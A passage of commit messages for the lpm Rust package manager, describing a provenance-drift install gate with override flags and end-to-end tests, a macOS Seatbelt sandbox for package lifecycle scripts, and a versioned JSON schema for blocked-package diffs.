* `provenance_reference_picks_lex_max_version_deterministically` —
  primary regression guard. Constructs a 3-entry map with distinct
  identities and runs the selector 8 times to exercise
  HashMap-hash-state variability; must always pick `2.0.0`.
* `provenance_reference_handles_scoped_name_correctly` — scoped
  package names like `@scope/pkg@1.0.0` must split at the LAST `@`,
  not the leading scope `@`.

## Ancillary updates

* `ProvenanceSnapshot` now derives `Default` so construction sites
  that only set `present` (e.g., `..Default::default()`) stay
  forward-compat across future field additions.
* Schema tests in `lpm-workspace` renamed from
  `provenance_snapshot_equality_is_tuple_strict` to
  `provenance_snapshot_full_equality_is_tuple_strict` with a
  docstring clarifying that full-struct equality is used for cache
  round-trip verification, NOT the drift identity tuple. Prevents
  future confusion between schema-level `==` and comparator-level
  `identity_equal`.
* `install.rs` drift-gate UX renders the identity as
  `<publisher> / <workflow_path>` plus a trailing `(ref: <ref>)`
  hint so reviewers can temporally place the approval without
  confusing the ref with identity.
* `build_state.rs` + `lpm-cli/src/provenance_fetch.rs` construction
  sites updated to the new field names.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3995/3995 pass, zero flakes. Focused
  provenance suite: 61/61 (+9 from the two fix groups).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…s + -g rejection

Wires the Phase 46 P4 provenance-drift override flags end-to-end and
extends the P3 global-install-rejection pattern to cover them.

## CLI surface

Two new clap args on `Commands::Install` (see `main.rs:218-246`):

* `--ignore-provenance-drift <PKG>` — repeatable; opts out of the
  drift check for one package name while keeping every other
  package's drift check live.
* `--ignore-provenance-drift-all` — blanket opt-out for this
  invocation.

Per Q2 of the P4 kickoff discussion, the two flags COMPOSE rather
than being mutually exclusive: `--ignore-provenance-drift-all`
supersedes the per-package list. No clap mutex — an orchestrator
forwarding both from higher-level config doesn't trip CI. The
precedence collapses inside `DriftIgnorePolicy::from_cli`.

## Canonical policy type

New `DriftIgnorePolicy` enum in `provenance_fetch.rs`:

```
use std::collections::HashSet;

#[derive(Clone, Default)]
pub enum DriftIgnorePolicy {
    #[default]
    EnforceAll,                    // default: no override
    IgnoreNames(HashSet<String>),  // per-package opt-out
    IgnoreAll,                     // blanket opt-out
}
```

* `Default` → `EnforceAll` (derived via `#[default]`), so every
  non-Install caller (add/upgrade/migrate/run/dev/deploy/doctor/
  install_global/update_global) defaults to enforcing drift by
  passing `DriftIgnorePolicy::default()`.
* `.ignores_all()` — drift gate short-circuits the whole `if
  !used_lockfile` block when true (zero network cost).
* `.ignores_name(&str)` — per-package consultation inside the gate.

Canonicalization tests:

* `drift_ignore_policy_no_flags_enforces_all` — baseline.
* `drift_ignore_policy_per_package_collapses_into_set` — happy path
  for the repeatable flag.
* `drift_ignore_policy_all_flag_alone_ignores_all` — blanket path.
* `drift_ignore_policy_all_flag_supersedes_per_package_list` — Q2
  regression guard: `-all` + `<pkg>` list → blanket, not error.
* `drift_ignore_policy_empty_inputs_canonicalize_to_enforce_all` —
  avoids an empty-set `IgnoreNames` that would semantically match
  `EnforceAll` but obscure the signal in debug output.
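
The canonicalization those tests describe could be sketched as
follows. The `from_cli` signature is an assumption (the text names the
function but not its parameters), as is `ignores_name` returning true
under `IgnoreAll`.

```rust
use std::collections::HashSet;

#[derive(Clone, Debug, Default, PartialEq)]
pub enum DriftIgnorePolicy {
    #[default]
    EnforceAll,
    IgnoreNames(HashSet<String>),
    IgnoreAll,
}

impl DriftIgnorePolicy {
    /// Hypothetical signature: repeatable per-package list plus the blanket flag.
    pub fn from_cli(names: &[String], ignore_all: bool) -> Self {
        if ignore_all {
            // The blanket flag supersedes the per-package list.
            return Self::IgnoreAll;
        }
        if names.is_empty() {
            // Never produce an empty `IgnoreNames` set.
            return Self::EnforceAll;
        }
        Self::IgnoreNames(names.iter().cloned().collect())
    }

    pub fn ignores_all(&self) -> bool {
        matches!(self, Self::IgnoreAll)
    }

    pub fn ignores_name(&self, name: &str) -> bool {
        match self {
            Self::EnforceAll => false,
            Self::IgnoreNames(set) => set.contains(name),
            Self::IgnoreAll => true, // assumption
        }
    }
}
```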

## Install-gate wiring (install.rs:1718-1755)

The drift gate now consults the policy in two places:

1. **Short-circuit** before the trusted-dependencies read when
   `.ignores_all()` is true. Emits a single advisory to stderr
   ("provenance-drift check waived by --ignore-provenance-drift-all")
   so the opt-out is visible in the install log — silent skip
   would hide that the user accepted a non-zero-risk identity.
2. **Per-package** inside the drift loop: before fetching the
   candidate's attestation, check `.ignores_name(&p.name)` and emit
   a per-package advisory ("X@Y — provenance-drift check waived by
   --ignore-provenance-drift (approved reference: vZ)") before
   `continue`-ing past the fetch. Skipping the fetch matters for
   offline / intermittent-network installs where a waived package
   wouldn't benefit from a pointless round-trip.

Footer UX extended to enumerate all three recovery paths in
narrowest-to-broadest order: re-approve via `lpm approve-builds`,
`--ignore-provenance-drift <pkg>`, `--ignore-provenance-drift-all`.
Error message's hint updated accordingly.

## Fan-out through the install pipeline

`run_with_options` / `run_add_packages` / `run_install_filtered_add`
all grow `drift_ignore_policy: DriftIgnorePolicy` at end of signature.
`run_install_filtered_add` clones the policy per targeted member in
the multi-member loop (cheap — enum + small HashSet) because each
iteration consumes the policy when calling into `run_with_options`.

Nine non-Install callers pass `DriftIgnorePolicy::default()` with
a one-line comment explaining why. Two test call sites for
`run_install_filtered_add` updated identically.

## Global-install rejection (main.rs:1576)

`validate_global_install_project_scoped_flags` gains two new
parameters mirroring the P3 `--min-release-age` rejection pattern:

```
ignore_provenance_drift: &[String],
ignore_provenance_drift_all: bool,
```

Non-empty list OR `ignore_provenance_drift_all = true` on the `-g` path fails with:

> `--ignore-provenance-drift` / `--ignore-provenance-drift-all`
> are not supported on `lpm install -g` in Phase 46 P4 (global
> trust store is tracked for Phase 46.1). Drop the flag for
> global installs.

D13/D19 rationale: the global trust store is a separate schema
(`lpm-global/src/trusted_deps.rs`, §3.9 in the plan) that doesn't
carry `provenance_at_approval`, so the override flags have no
semantic target on the `-g` path. Reject explicitly rather than
silently drop — same safety argument the P3 reviewer made for the
cooldown flag.
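
The rejection rule in isolation, as a hedged sketch: the real check
lives inside `validate_global_install_project_scoped_flags` alongside
other flags, and the standalone function name and `String` error type
below are hypothetical.

```rust
/// Hypothetical standalone form of the `-g` rejection for the drift overrides.
fn reject_drift_overrides_on_global(
    ignore_provenance_drift: &[String],
    ignore_provenance_drift_all: bool,
) -> Result<(), String> {
    if !ignore_provenance_drift.is_empty() || ignore_provenance_drift_all {
        // Reject explicitly rather than silently dropping the flag.
        return Err(
            "`--ignore-provenance-drift` / `--ignore-provenance-drift-all` are not \
             supported on `lpm install -g` in Phase 46 P4 (global trust store is \
             tracked for Phase 46.1). Drop the flag for global installs."
                .to_string(),
        );
    }
    Ok(())
}
```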

Two new rejection regression tests:

* `install_global_rejects_ignore_provenance_drift_flag` — covers
  the repeatable per-package variant (tests with two `<pkg>`
  arguments).
* `install_global_rejects_ignore_provenance_drift_all_flag` —
  covers the blanket variant.

Existing `install_global_rejects_project_scoped_yes_flag` +
`install_global_rejects_min_release_age_flag` tests updated to
pass the two new validator args (empty list + false).

## Behavioural verification

* `lpm-rs install --help` — both flags documented with full rationale.
* `lpm-rs install -g eslint --ignore-provenance-drift axios` → exit
  1, error names the flag + Phase 46.1.
* `lpm-rs install -g eslint --ignore-provenance-drift-all` → exit
  1, same rejection shape.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean (with two
  lint-related changes explained below).
* `cargo fmt --check` — clean.
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches.
* `cargo build --workspace` — clean.
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4002/4002 pass**, zero flakes.

## Lint pragmas and fixes

* `#[allow(clippy::too_many_arguments)]` on
  `validate_global_install_project_scoped_flags` — 8 args is above
  the clippy threshold but every argument is a distinct flag
  surface that belongs on the validator; packaging them into a
  struct would add ceremony without improving callsite clarity
  (the two test callers already pass them individually for test
  documentation).
* `DriftIgnorePolicy` derives `Default` via `#[default]` on the
  `EnforceAll` variant (was a manual impl; clippy's
  `derivable_impls` caught it).

Chunk 5 follows with the wiremock E2E suite covering the §11 P4
ship criteria + these override flags end-to-end.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
End-to-end coverage for the Phase 46 P4 drift gate + override
flags, exercising the full `lpm install` pipeline against a
wiremock-backed registry that serves BOTH the package metadata
(with `dist.attestations.url`) AND the attestation bundle itself.
Harness pattern mirrors `release_age_p3_ship_criteria.rs` with two
new pieces: (a) the bundle endpoint serves a synthetic Sigstore
bundle whose leaf cert carries a deterministic GitHub Actions OIDC
SAN URI (generated via rcgen per test), (b) the project manifest's
`trustedDependencies` map carries a populated
`provenanceAtApproval` so the drift gate has a reference to
compare against.

## §11 P4 ship criteria covered

1. **`attestation_deleted_between_approved_and_candidate_blocks`** —
   the axios 1.14.1 scenario end-to-end. Approved v1.0.0 has
   provenance; registry serves v1.0.1 with NO `dist.attestations`.
   Install blocks with "provenance dropped" verdict.
2. **`ignore_provenance_drift_per_package_unblocks`** — same
   fixture plus `--ignore-provenance-drift @lpm.dev/acme.widget`.
   Drift block suppressed AND the waiver-advisory line appears
   (the opt-out is audit-visible, not silent).
3. **`ignore_provenance_drift_all_unblocks`** — blanket waiver
   fires at the zero-cost short-circuit; the
   "waived for this install by --ignore-provenance-drift-all"
   advisory appears before the per-package loop would have.
4. **`identity_changed_between_approved_and_candidate_blocks`** —
   both versions carry attestations but the publisher differs
   ("repo moved to attacker fork" scenario). Verdict:
   "publisher identity changed".

## Reviewer-flagged regression guards

5. **`legitimate_release_bump_does_not_drift`** — Finding-1 E2E
   guard. v1.0.0 → v1.0.1 from the same publisher + same workflow
   file necessarily differs on `workflow_ref` AND
   `attestation_cert_sha256` (Fulcio's per-signing leaf). Identity-
   tuple equality excludes both; install proceeds. If this test
   ever regresses, every legitimate patch bump would hard-block —
   catastrophic for gate usability. Guards eec6312's comparator
   fix.
6. **`allow_new_alone_does_not_bypass_drift`** — D16 orthogonality
   guard. Approved-present + candidate-absent scenario with just
   `--allow-new` passed. P3 cooldown override MUST NOT bypass P4
   drift: the two gates are orthogonal and their overrides are
   scoped independently. Regression here would silently merge the
   two gates and break the reviewer-surfaced "cooldown and
   provenance are orthogonal signals" contract.

## Reliability guard

7. **`degraded_fetch_does_not_falsely_block`** — attestation URL
   returns HTTP 500. Fetcher degrades to `Ok(None)` per the P4
   offline-mode contract; comparator returns `NoDrift`; install
   proceeds. A Sigstore rate-limit or transient network error
   must NEVER produce a spurious drift block — this test guards
   the `(Some(_), None) → NoDrift` branch in
   `check_provenance_drift`.

## Zero-cost short-circuit guard

8. **`project_with_no_approvals_skips_drift_gate`** — a project
   without any rich `trustedDependencies` entries must skip the
   gate entirely: no `LpmRoot::from_env()` call, no
   `reqwest::Client` construction, no per-package iteration. The
   `-all` waive advisory must NOT fire (user didn't pass it).
   Guards the Chunk 3 `has_rich_approvals` optimization.

## Harness structure

Shared fixtures (~250 LOC) + 8 focused tests (~150 LOC). Two
parameterized enums (`AttestationShape` / `AttestationResponse`)
drive the registry's response shape, so each test describes its
scenario in 3-4 lines. rcgen generates an ephemeral cert per
test — the SHA rotates as it would in production, proving the
comparator doesn't accidentally depend on cert-SHA equality.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4010/4010 pass**, zero flakes. New E2E
  suite: 8/8 pass in 1.74s total (each test ~1.7s for
  subprocess + mock-server spinup).

## P4 status after this chunk

The P4 client-side work is feature-complete. Remaining for
ship-complete: the separate server-side registry PR that adds
`dist.signatures` + `dist.attestations` to the LPM registry's
package-metadata response (§11 P4 parallel track, out of this
branch's scope). Until that lands, LPM-registry packages will
degrade to "unknown attestation" per the `Ok(None)` contract; the
drift gate is still active for npm-hosted packages that already
serve `dist.attestations`.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rt-circuit naming

Two reviewer-flagged harness-strength defects in 30ae5f9, both
addressed with stronger assertions or more modest claims — not
production-code changes.

## Finding 1 — unblocked tests overclaimed "install proceeds"

The shared `assert_drift_not_blocked` helper only checked for
absence of the drift-block message. Five tests
(`ignore_provenance_drift_per_package_unblocks`,
`ignore_provenance_drift_all_unblocks`,
`legitimate_release_bump_does_not_drift`,
`degraded_fetch_does_not_falsely_block`, and the renamed
no-approvals test) claimed "install proceeds" / "install
unblocks" but would pass equally well if the subprocess exited
non-zero for some unrelated reason (e.g., a regression in a
downstream pipeline stage that leaves the drift message absent).

Fix: new helper `assert_drift_not_blocked_and_install_succeeded`
that composes three checks:

1. The drift-block message is absent (unchanged).
2. `status.success()` — exit 0 proves the subprocess didn't fail
   for any reason.
3. A post-link completion marker appears in the output
   (`"linked"` on the human path OR `"success":true` on the JSON
   path). This proves the pipeline reached stages AFTER the drift
   gate: the gate runs BEFORE fetch/link, so a completion marker
   is reliable evidence of forward progress, not merely "the
   drift branch didn't emit its block message."

All five unblocked tests switched to the stronger helper. All 8
still pass (1.7 s each; 8 tests in 1.8 s total wall time).
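
A minimal sketch of how the three checks compose, written as a pure function so it can be read without the subprocess harness. The function name, the `exit_ok` parameter (standing in for `status.success()`), and the `DRIFT_BLOCK_MARKER` text are assumptions for illustration; the real helper's signature and the real block message are not quoted in this commit.

```rust
/// Hypothetical stand-in for the real drift-block message, which this
/// commit message does not quote.
const DRIFT_BLOCK_MARKER: &str = "provenance drift";

/// Returns Ok(()) only when all three conditions hold.
/// `exit_ok` models `status.success()`; `output` is the captured output.
fn check_unblocked_and_succeeded(exit_ok: bool, output: &str) -> Result<(), String> {
    // 1. The drift-block message must be absent.
    if output.contains(DRIFT_BLOCK_MARKER) {
        return Err("drift gate blocked the install".to_string());
    }
    // 2. The subprocess must have exited 0.
    if !exit_ok {
        return Err("install exited non-zero for an unrelated reason".to_string());
    }
    // 3. A post-link completion marker must be present (human or JSON path).
    let completed = output.contains("linked") || output.contains("\"success\":true");
    if !completed {
        return Err("no completion marker; pipeline never got past the gate".to_string());
    }
    Ok(())
}
```

With only check 1, an empty output from a crashed subprocess would pass; checks 2 and 3 are what turn "no block message" into "install proceeded".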

## Finding 2 — "skips drift gate" test didn't actually verify the skip

`project_with_no_approvals_skips_drift_gate` claimed to guard the
Chunk 3 `has_rich_approvals` short-circuit optimization in
`install.rs`. But that optimization is a pure internal performance
fast-path: the alternative (gate enters, iterates packages, each
returns `None` from `provenance_reference_for_name`, no fetch
fires) produces the exact same external behavior. A runtime
subprocess test cannot distinguish "fast path taken" from "slow
path with no matches" without instrumentation (e.g., a `tracing`
debug marker + log-capturing harness).

Fix: rename the test to
`project_with_no_approvals_does_not_block_on_drift` — what the
assertions ACTUALLY prove. Updated the docstring to explain the
previous overclaim, note that verifying the specific optimization
is deferred to a future tracing-based harness, and document the
observable contract this test now guards (no block + no blanket-
waive advisory + install completes end-to-end).

The test body itself now also uses the stronger
`assert_drift_not_blocked_and_install_succeeded` helper, so it
catches the Finding-1-class regression simultaneously.

## Top-of-file coverage comment updated

The module docstring's test list was missing item 8 (the no-
approvals case) and didn't describe the new "strong unblocked
assertion" shape. Both added so the file reads coherently.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4010/4010 pass**, zero flakes.
* Focused suite:
  `cargo nextest run -p lpm-cli --test provenance_drift_p4_ship_criteria`
  — 8/8 pass under the tighter assertions.

Production code from Chunks 1-4 is unchanged. The blocker was
strictly in the ship-criteria test harness layer.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Introduces crates/lpm-sandbox with the public API that Chunks 2-6 build
on without touching the call site in build.rs. No wiring yet: scripts
still run exactly as they do on main, since nothing constructs a
Sandbox outside the crate's own tests. Scaffolds:

- SandboxSpec: package + project + host path set the platform backend
  needs to synthesize its profile, plus extra_write_dirs for the
  package.json > lpm > scripts > sandboxWriteDirs escape hatch (§9.6).
  All paths must be absolute; validate_spec enforces before construction.
- SandboxMode: Enforce (default), LogOnly (diagnostic, explicitly
  non-authoritative per Chunk 4 signoff), Disabled (--unsafe-full-env
  --no-sandbox). Disabled always works — the escape hatch is reachable
  from every platform including Windows.
- SandboxedCommand + SandboxStdio: platform-neutral process description
  so backends own the OS-level Command (macOS rewrites the program to
  sandbox-exec; Linux installs pre_exec). Callers never touch
  std::process::Command directly.
- Sandbox trait: spawn() + backend_name() + mode(). Object-safe, so
  callers hold Box<dyn Sandbox>.
- SandboxError: structured variants (UnsupportedPlatform, KernelTooOld,
  ProfileRenderFailed, SpawnFailed, InvalidSpec) each carry a
  user-facing remediation field — §12.5's escape-corpus tests in
  Chunk 5 assert against these.
- unsupported_remediation(): single source of truth for the
  "sandbox unavailable on windows — Phase 46.1 …" string Chunk 4
  surfaces at the CLI layer, so the doc reference and CLI surface
  stay in sync.
- NoopSandbox: real functional backend for SandboxMode::Disabled. Runs
  the command with no containment on every platform. This is the only
  non-stub impl in Chunk 1.
- macos.rs + linux.rs: cfg-gated backend stubs per CLAUDE.md
  cross-platform hygiene rule. Both construct successfully so the
  factory contract is stable across chunks; spawn() returns
  ProfileRenderFailed naming the Chunk that wires the real impl.
  Avoids silent no-op containment on platforms that should have it.
- Factory dispatch via platform_backend(): each arm is a fully cfg-gated
  free function, so unsupported platforms don't compile dead code from
  supported arms (CLAUDE.md ungated-platform-code rule).
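
For orientation, a rough sketch of the trait shape described above, reduced to the Disabled path. Field sets, the `"noop"` backend name, and the `backend_for` helper are assumptions made for this sketch; the real crate has more variants, more fields, and cfg-gated platform arms.

```rust
use std::process::{Child, Command};

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum SandboxMode {
    Enforce,
    LogOnly,
    Disabled,
}

/// Platform-neutral process description (illustrative subset of fields).
struct SandboxedCommand {
    program: String,
    args: Vec<String>,
}

/// Only one variant is sketched; each carries a user-facing remediation.
#[derive(Debug)]
enum SandboxError {
    SpawnFailed { remediation: String },
}

/// Object-safe: no generic methods and no `Self` by value, so callers
/// can hold a `Box<dyn Sandbox>`.
trait Sandbox {
    fn spawn(&self, cmd: &SandboxedCommand) -> Result<Child, SandboxError>;
    fn backend_name(&self) -> &'static str;
    fn mode(&self) -> SandboxMode;
}

/// Backend for `SandboxMode::Disabled`: runs the command uncontained.
struct NoopSandbox;

impl Sandbox for NoopSandbox {
    fn spawn(&self, cmd: &SandboxedCommand) -> Result<Child, SandboxError> {
        Command::new(&cmd.program)
            .args(&cmd.args)
            .spawn()
            .map_err(|e| SandboxError::SpawnFailed {
                remediation: format!("could not start `{}`: {e}", cmd.program),
            })
    }

    fn backend_name(&self) -> &'static str {
        "noop" // assumed name, not taken from the crate
    }

    fn mode(&self) -> SandboxMode {
        SandboxMode::Disabled
    }
}

/// Hypothetical factory: only the Disabled arm is filled in here.
fn backend_for(mode: SandboxMode) -> Option<Box<dyn Sandbox>> {
    match mode {
        SandboxMode::Disabled => Some(Box::new(NoopSandbox)),
        // Platform backends (Seatbelt, landlock) are omitted from this sketch.
        SandboxMode::Enforce | SandboxMode::LogOnly => None,
    }
}
```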

Chunk 1 ship criteria:
- Crate compiles workspace-wide clippy-clean on macOS (host) and Linux
  (CI will confirm). ✓ cargo clippy --workspace -- -D warnings clean.
- Unit tests cover SandboxSpec construction, SandboxMode properties,
  SandboxedCommand builder, every SandboxError variant's Display
  (including token-level assertions the Chunk 5 corpus will reuse),
  validate_spec's invariants, factory dispatch per mode + per
  platform, and NoopSandbox end-to-end with a trivial command.
  22/22 pass.
- No wiring into execute_script — build.rs unchanged. ✓

Gate status (CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast: 4031 passed, 1 flake in
  lpm-task::perf_eval_glob_200_members_under_500us_per_call (passes
  isolated in 0.134s — pre-existing brittleness of the 500µs
  perf assertion under heavy parallel load; not introduced by this
  change).
- cargo test -p lpm-auth x3: 47/47 deterministic under parallel test
  runner.

Branch: phase-46-p5, cut from phase-46 at 7153e59 per signoff
(P4 stays unmerged from main; P5 builds on phase-46).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces build.rs's direct `Command::new("sh")` spawn on macOS with a
sandbox-exec-wrapped spawn routed through lpm_sandbox. Ship criteria
#1 (deny reads + writes outside allow list) and #2 (benign postinstall
succeeds) covered by unit tests that actually shell out to
sandbox-exec on the host. Linux stays on the Chunk 1 stub + cfg-forked
legacy path in build.rs until Chunk 3 lands landlock; non-macOS
platforms observe zero behavior change from this chunk.

SandboxMode is computed at the build call site (not encoded in
ScriptPolicyConfig) per the Chunk 2 signoff:
- default → SandboxMode::Enforce
- `--unsafe-full-env --no-sandbox` → SandboxMode::Disabled (escape
  hatch; emits a loud warning banner at the call site)
- `--sandbox-log` → SandboxMode::LogOnly (strictly diagnostic —
  banner explicitly tells the user a clean run is NOT a safety
  signal; Chunk 4 lands the real non-enforcing backend)

`--no-sandbox` requires `--unsafe-full-env` (clap-level `requires`
attribute; using `--no-sandbox` alone errors out). `--no-sandbox`
and `--sandbox-log` are mutually exclusive (clap `conflicts_with`).
Auto-build inside `lpm install` hardcodes both to `false` — autoBuild
never bypasses containment (D20).
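
The flag-to-mode mapping can be sketched as a plain function. In the shipped code the `requires` / `conflicts_with` rules are enforced by clap before this point; the sketch folds them into a `Result` purely for illustration, and the function name and error strings are assumptions.

```rust
#[derive(Debug, PartialEq, Eq)]
enum SandboxMode {
    Enforce,
    LogOnly,
    Disabled,
}

/// Maps the three CLI flags onto a mode, rejecting the combinations
/// that clap rejects in the real CLI.
fn sandbox_mode_from_flags(
    unsafe_full_env: bool,
    no_sandbox: bool,
    sandbox_log: bool,
) -> Result<SandboxMode, String> {
    // `--no-sandbox` and `--sandbox-log` are mutually exclusive.
    if no_sandbox && sandbox_log {
        return Err("--no-sandbox conflicts with --sandbox-log".to_string());
    }
    // `--no-sandbox` alone is an error; it requires `--unsafe-full-env`.
    if no_sandbox && !unsafe_full_env {
        return Err("--no-sandbox requires --unsafe-full-env".to_string());
    }
    Ok(if no_sandbox {
        SandboxMode::Disabled
    } else if sandbox_log {
        SandboxMode::LogOnly
    } else {
        SandboxMode::Enforce
    })
}
```

Auto-build inside `lpm install` corresponds to calling this with `no_sandbox = false` and `sandbox_log = false`, which always yields `Enforce`.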

Sandbox crate additions:
- seatbelt.rs: renders the §9.3 Seatbelt profile per-package with
  `{package_dir}/{project_dir}/{home}/{tmpdir}` interpolation.
  Writable set stays narrow (§9.3 verbatim: package dir + node_modules
  + .husky + .lpm + ~/.cache + ~/.node-gyp + ~/.npm + /tmp + $TMPDIR
  + sandboxWriteDirs extras). Read set widens past the schematic §9.3
  layout with the system primitives real macOS binaries need to load:
  stat-the-root literal `/`, /bin + /sbin for coreutils, /System (not
  just /System/Library) for dyld shared cache, /private/etc for
  libc / resolver, /private/var/db/dyld for the shared cache, /dev
  (read-only) for /dev/fd + stdin + stdout + stderr + tty + urandom.
  Process primitives: `(allow process*)`, `(allow signal)`,
  `(allow mach-lookup)`, `(allow sysctl-read)`, `(allow iokit-open)`
  — all confirmed empirically necessary (deny-default blocks even
  /usr/bin/true without them on recent macOS releases). Network stays
  on per D3.
- config.rs: `load_sandbox_write_dirs` — the one place that reads
  package.json > lpm > scripts > sandboxWriteDirs. Relative paths
  resolve against project_dir; empty strings rejected (would widen
  writes to whole project); non-array / non-string entries surface
  as SandboxError::InvalidSpec with an actionable path to fix.
- macos.rs: SeatbeltSandbox replaces the Chunk 1 stub. `new()` renders
  the profile up front (so render errors surface at construction,
  not mid-spawn). `spawn()` prepends `sandbox-exec -p <profile>` to
  the program+args, applies envs/cwd/stdio from the SandboxedCommand,
  and sets process_group(0) on unix for kill-tree-on-timeout parity
  with the pre-Phase-46 path. NoopSandbox now also sets
  process_group(0) on unix so `--no-sandbox` is observably identical
  to the legacy direct-spawn.
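
The `sandboxWriteDirs` resolution rules from the config.rs bullet can be illustrated with a small std-only sketch. It covers only path resolution and the empty-string rejection; `resolve_write_dirs` is a hypothetical name, the error is a plain `String` rather than `SandboxError::InvalidSpec`, and reading package.json is left out.

```rust
use std::path::{Path, PathBuf};

/// Resolves already-parsed `sandboxWriteDirs` entries against the project
/// directory. Absolute entries pass through unchanged.
fn resolve_write_dirs(project_dir: &Path, entries: &[&str]) -> Result<Vec<PathBuf>, String> {
    let mut resolved = Vec::with_capacity(entries.len());
    for entry in entries {
        // An empty entry would join to the project dir itself and widen
        // writes to the whole project, so it is rejected up front.
        if entry.is_empty() {
            return Err("sandboxWriteDirs entries must be non-empty strings".to_string());
        }
        let path = Path::new(entry);
        resolved.push(if path.is_absolute() {
            path.to_path_buf()
        } else {
            project_dir.join(path)
        });
    }
    Ok(resolved)
}
```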

build.rs integration:
- `run` grows `no_sandbox` + `sandbox_log` params.
- Before the script loop: compute SandboxMode, emit the appropriate
  warning banner, load `extra_write_dirs` once, derive `store_root`
  from LpmRoot, derive `home_dir` from `dirs::home_dir()`, derive
  `tmpdir` from `$TMPDIR` or `/tmp`.
- `execute_script` grows pkg_name/pkg_version/sandbox_mode/
  extra_write_dirs/store_root/home_dir/tmpdir params. Env-building
  (INIT_CWD + augmented PATH) is platform-neutral and happens once
  per call. The spawn step is the ONE cfg-fork point:
  `spawn_lifecycle_child` on macOS routes through
  `lpm_sandbox::new_for_platform`; on non-macOS it runs the legacy
  direct-Command path. Chunk 3 deletes the non-macOS arm.

Adjacent fix: two pre-existing `assert_eq!(x, false)` lints in
build_state.rs that clippy --all-targets surfaces on this base.
They went unnoticed because `--all-targets` isn't on the current CI
invocation; flagged in gate summary so the crew is aware the guard
is partial.

Gate status (macOS host, CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo clippy --workspace --all-targets -- -D warnings: clean (after
  fixing the two pre-existing build_state.rs asserts)
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast: 4061 passed, 1 flake (same lpm-task::perf_eval
  under-load flake as Chunk 1 — passes isolated in 0.159s, pre-existing
  500µs perf-assertion brittleness)
- cargo test -p lpm-auth x3: 47/47 deterministic
- lpm-sandbox crate: 52/52 (13 new seatbelt profile tests, 10 new
  config tests, 4 new macos integration tests that shell out to
  sandbox-exec for real containment probes, plus the 22 lib tests
  inherited from Chunk 1 with the Linux-stub assertion updated)

Ship criteria for Chunk 2:
- ✓ §11 P5 criterion #1: a forbidden-read and a forbidden-write both
  fail on macOS (macos::tests::enforces_deny_default_for_forbidden_read
  + denies_write_outside_allow_list_under_enforce).
- ✓ §11 P5 criterion #2: a benign write into the package's own store
  dir succeeds on macOS (macos::tests::
  allows_write_into_package_dir_under_enforce +
  spawns_a_trivial_benign_command_inside_its_own_package_dir).
- ✓ Linux path unchanged from pre-Phase-46 (cfg-forked legacy
  Command::new path; Linux stub still returns ProfileRenderFailed
  from Sandbox::spawn — guarded by linux_backend_is_still_stub_in_chunk2).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin and others added 16 commits April 22, 2026 17:39
…rsion_diff)

C4 surfaces the version-diff data on the machine channel so agents
driving `lpm approve-builds` and `lpm install --json` can route by
drift dimension without re-classifying. Bumps `SCHEMA_VERSION 2 → 3`
and consolidates the per-blocked-entry JSON shape onto a single
shared helper so the install pipeline and the approve-builds command
cannot drift on the wire.

## Wire shape — version_diff (per blocked entry)

Stable contract: every `version_diff` object emits the SAME keys with
`null` for dimensions that didn't drift, so agents read with uniform
key access.

```json
"version_diff": {
  "prior_version": "1.14.0",
  "candidate_version": "1.14.1",
  "reason": "provenance-drift",         // kebab-case wire form
  "script_hash_drift": false,           // always bool
  "behavioral_tags_added": null,        // [...] when drifted, null otherwise
  "behavioral_tags_removed": null,
  "provenance_drift_kind": "dropped"    // "identity-changed" | "dropped" | "gained" | null
}
```

`version_diff` itself is `null` when no prior approved binding exists
for the package name (first-time review). When a prior exists, the
object emits even for `reason: "no-change"` so agents can
distinguish "we found the prior at v1.14.0 and it matches" from "no
prior to compare." Same semantic as the C3 TUI: the diff is a
positive equality assertion, not the absence of comparison.

Reason wire forms (kebab-case to match `static_tier`'s convention):
- `no-change`: every dimension we can compare matches.
- `script-hash-drift`: only the script hash drifted.
- `behavioral-tag-shift`: only the behavioral-tag set drifted.
- `provenance-drift`: only the provenance identity tuple drifted.
- `multi-field-drift`: two or more dimensions drifted simultaneously.

`behavioral_tags_added: []` (vs. `null`) is semantically meaningful:
an empty array means "tag dimension drifted, with only LOST changes";
null means "tag dimension didn't drift in this case." The distinction
is preserved across the BehavioralTagShift and MultiFieldDrift variants.
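
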